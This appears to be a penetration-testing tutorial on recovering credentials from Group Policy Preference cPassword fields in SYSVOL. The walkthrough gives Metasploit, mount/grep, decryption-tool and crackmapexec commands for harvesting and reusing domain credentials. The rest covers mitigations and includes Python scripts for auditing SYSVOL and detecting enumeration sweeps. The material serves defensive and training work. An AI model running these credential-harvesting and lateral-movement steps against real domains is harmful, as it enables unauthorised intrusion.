GPP cPassword Attacks

  • Group Policy Preferences (GPP) allowed administrators to create policies with embedded credentials for tasks like service account management.

  • These credentials were encrypted and stored in a “cPassword” field within Group Policy XML files.

  • Microsoft’s encryption key was accidentally released publicly, allowing anyone to decrypt the cPassword values.

  • Patched in MS14-025 (KB2962486), but the patch only prevents creation of new encrypted credentials—it does not remove or decrypt existing vulnerable files.

  • This makes GPP cPassword attacks highly relevant on penetration tests, as legacy deployments often retain old GPP files in SYSVOL.

Walkthrough

  1. Enumerate GPP Files from SYSVOL

Use Metasploit’s smb_enum_gpp module to access the SYSVOL of the domain controller and extract Group Policy Preference files:

msfconsole
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS <domain_controller_ip>
set SMBUser <domain_user>
set SMBPass <domain_password>
set SMBDomain <domain_name>
run

Alternatively, you can manually mount SYSVOL and search for XML files containing cPassword:

mount -t cifs //<domain_controller>/SYSVOL /mnt/sysvol -o username=<user>,password=<pass>
# the attribute is written in lower case in the XML files, so match case-insensitively
grep -ril --include='*.xml' "cpassword" /mnt/sysvol

  2. Decrypt cPassword Values

Once you identify files with cPassword entries, use tools to decrypt them. Common approaches include:

  • Using the Metasploit GPP post module (run through an existing session on a domain-joined host):

    use post/windows/gather/credentials/gpp
    
  • Using impacket-Get-GPPPassword or similar custom tools that implement the known decryption algorithm.

  • Using CyberChef or gpp-decrypt online tools (not recommended for sensitive environments).

  3. Validate and Use Credentials

Test the decrypted credentials on domain systems:

crackmapexec smb <target_range> -u <username> -p <decrypted_password> -d <domain>

Apply lateral movement techniques with the recovered credentials.
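The manual SYSVOL search in step 1 and the "audit and remove" mitigation below both reduce to the same check: which Preferences XML files still carry a cPassword attribute. The following script is an added example, not code from the original page. It walks a SYSVOL copy (the /mnt/sysvol mount from step 1 is the assumed input), parses only the Preferences file types GPP writes, and reports each affected item together with the account it belongs to, without decrypting anything. The sample files it builds are constructed, with placeholder GUIDs and placeholder cpassword values rather than real ciphertext.

```python
"""Audit a SYSVOL copy for Group Policy Preference items that still carry a cPassword.

Added example, not code from the original page. Walks a SYSVOL tree (the
/mnt/sysvol mount from the walkthrough is assumed), parses only the Preferences
XML files GPP writes, and reports each item whose Properties element still has
a cPassword attribute. Nothing is decrypted: presence alone is reason to remove
the item from the GPO.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preferences file types that can embed credentials (compared case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# The attribute naming the account differs by file type.
ACCOUNT_ATTRS = ("userName", "username", "runAs", "accountName")


def audit_sysvol(root_dir):
    """Return findings as (relative path, item tag, account) tuples, sorted by path."""
    root = Path(root_dir)
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name.lower() not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # one malformed file must not abort the whole audit
        parent_of = {child: parent for parent in tree.iter() for child in parent}
        for elem in tree.iter():
            # On disk the attribute is written as 'cpassword'; match any casing.
            if not any(name.lower() == "cpassword" for name in elem.attrib):
                continue
            account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), "<unknown>")
            item = parent_of.get(elem, elem)  # <Properties> sits under <User>, <Task>, <NTService>, ...
            findings.append((path.relative_to(root).as_posix(), item.tag, account))
    return findings


# Constructed sample SYSVOL content: placeholder GUID and cpassword values, not real ciphertext.
_GPO = "contoso.local/Policies/{00000000-0000-0000-0000-000000000001}/Machine/Preferences"
SAMPLE_FILES = {
    f"{_GPO}/Groups/Groups.xml": (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<Groups><User name="LocalAdmin">'
        '<Properties action="U" newName="" fullName="" description="" '
        'cpassword="PLACEHOLDER-NOT-REAL" userName="LocalAdmin"/>'
        '</User></Groups>\n'
    ),
    f"{_GPO}/ScheduledTasks/ScheduledTasks.xml": (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<ScheduledTasks><Task name="NightlyBackup">'
        '<Properties action="C" runAs="CONTOSO\\svc_backup" cpassword="PLACEHOLDER-NOT-REAL"/>'
        '</Task></ScheduledTasks>\n'
    ),
    # Already remediated: the service item keeps its account name but no cpassword.
    f"{_GPO}/Services/Services.xml": (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<NTServices><NTService name="Spooler">'
        '<Properties startupType="AUTOMATIC" serviceName="Spooler" accountName="CONTOSO\\svc_print"/>'
        '</NTService></NTServices>\n'
    ),
}


def build_sample_sysvol(dest_dir):
    """Write the constructed sample files under dest_dir and return it as a Path."""
    dest = Path(dest_dir)
    for rel, body in SAMPLE_FILES.items():
        target = dest / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return dest


def run_demo():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_sysvol(tmp)
        return audit_sysvol(tmp)


if __name__ == "__main__":
    for rel_path, item, account in run_demo():
        print(f"cPassword present: {rel_path}  item={item}  account={account}")
```

Run it against a real mount with `audit_sysvol("/mnt/sysvol")`; each finding names the GPO folder, the preference item type and the account, which is what the GPO owner needs to delete the item and rotate that account's password.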

Mitigations

  • Apply MS14-025 (KB2962486): Patch all systems to prevent creation of new encrypted credentials in Group Policy Preferences. However, this is not sufficient alone.

  • Delete Legacy GPP XML Files: Manually remove or audit old GPP XML files stored in \\<domain>\SYSVOL\<domain>\Policies\ that may contain cPassword entries. Use:

    # List every Preferences XML file under SYSVOL (Machine and User) that still carries a cPassword;
    # the attribute is written in lower case in the files, so match case-insensitively
    find /mnt/sysvol -type f -ipath '*/Preferences/*.xml' -exec grep -il 'cpassword' {} +
    
    # Audit and remove vulnerable Group Policy Objects
    
  • Restrict SYSVOL Access: Limit read access to SYSVOL to only authorized administrators.

  • Monitor for GPP Enumeration: Alert on unusual SMB connections to domain controllers and SYSVOL access attempts.

  • Use Group Managed Service Accounts (gMSA): Replace embedded credentials with gMSAs for service accounts; their passwords are generated and rotated automatically by the domain.
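To make the monitoring bullet concrete, the following is an added example, not code from the original page, of detection logic run over constructed Windows Security events. It assumes detailed file share auditing (event ID 5145) is enabled on the domain controllers, which records the share name and the path opened relative to the share for each SMB file access; the events here are constructed dictionaries carrying only the 5145 fields the rule needs, not real logs. A domain member reading the Preferences files of the few GPOs that apply to it is normal background; one client opening Preferences XML across many GPOs in a short window is the pattern a SYSVOL sweep such as smb_enum_gpp produces, so the rule keys on the number of distinct GPO GUIDs per source within a time window.

```python
"""Flag SYSVOL sweeps of Group Policy Preference XML files from share-access events.

Added example, not code from the original page. Assumes detailed file share
auditing (event ID 5145) is enabled on domain controllers; each event carries
the share name, the path opened relative to the share, the source IP and the
account. The events below are constructed for the demo, not real logs.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Preferences XML paths inside SYSVOL, capturing the GPO GUID; matched case-insensitively.
GPP_PATH = re.compile(
    r"\\Policies\\\{([0-9A-F-]{36})\}\\(?:Machine|User)\\Preferences\\[^\\]+\\[^\\]+\.xml$",
    re.IGNORECASE,
)

# Constructed events (placeholder GUIDs and addresses) with the 5145 fields the rule needs.
SAMPLE_EVENTS = [
    # A workstation refreshing the single GPO that applies to it: expected noise.
    {"EventID": 5145, "TimeCreated": "2024-05-01T08:00:01", "SubjectUserName": "WS01$",
     "IpAddress": "10.0.1.20", "ShareName": "\\\\*\\SYSVOL",
     "RelativeTargetName": "contoso.local\\Policies\\{00000000-0000-0000-0000-000000000001}"
                           "\\Machine\\Preferences\\Groups\\Groups.xml"},
    # One client opening Preferences files across five GPOs within seconds: a sweep.
    *[
        {"EventID": 5145, "TimeCreated": f"2024-05-01T08:05:{i:02d}", "SubjectUserName": "jdoe",
         "IpAddress": "10.0.1.50", "ShareName": "\\\\*\\SYSVOL",
         "RelativeTargetName": f"contoso.local\\Policies\\{{00000000-0000-0000-0000-00000000000{i}}}"
                               "\\Machine\\Preferences\\Groups\\Groups.xml"}
        for i in range(1, 6)
    ],
    # Same client reading a non-Preferences file on SYSVOL: not counted by the rule.
    {"EventID": 5145, "TimeCreated": "2024-05-01T08:05:10", "SubjectUserName": "jdoe",
     "IpAddress": "10.0.1.50", "ShareName": "\\\\*\\SYSVOL",
     "RelativeTargetName": "contoso.local\\Policies\\{00000000-0000-0000-0000-000000000001}\\GPT.INI"},
]


def detect_gpp_sweeps(events, window=timedelta(minutes=5), min_gpos=3):
    """Return one alert per (source IP, account) that read Preferences XML from
    at least min_gpos distinct GPOs within any `window`-long span."""
    reads = defaultdict(list)  # (ip, user) -> [(timestamp, gpo_guid), ...]
    for ev in events:
        if ev.get("EventID") != 5145 or not ev.get("ShareName", "").upper().endswith("\\SYSVOL"):
            continue
        match = GPP_PATH.search(ev.get("RelativeTargetName", ""))
        if not match:
            continue
        key = (ev["IpAddress"], ev["SubjectUserName"])
        reads[key].append((datetime.fromisoformat(ev["TimeCreated"]), match.group(1).upper()))

    alerts = []
    for (ip, user), items in reads.items():
        items.sort()
        best, best_span, start = 0, None, 0
        # Sliding window over the time-ordered reads: track the largest number of
        # distinct GPOs this source touched within a single window.
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = len({guid for _, guid in items[start:end + 1]})
            if distinct > best:
                best, best_span = distinct, (items[start][0], items[end][0])
        if best >= min_gpos:
            alerts.append({"ip": ip, "user": user, "gpo_count": best,
                           "first_seen": best_span[0].isoformat(),
                           "last_seen": best_span[1].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_gpp_sweeps(SAMPLE_EVENTS):
        print(f"ALERT GPP sweep from {alert['ip']} as {alert['user']}: "
              f"{alert['gpo_count']} GPOs between {alert['first_seen']} and {alert['last_seen']}")
```

The threshold and window are the tuning knobs: set min_gpos above the number of GPOs a normal client applies in your domain, and pair the alert with the "restrict SYSVOL access" mitigation, since a source that is not a domain member at all should never appear in these events.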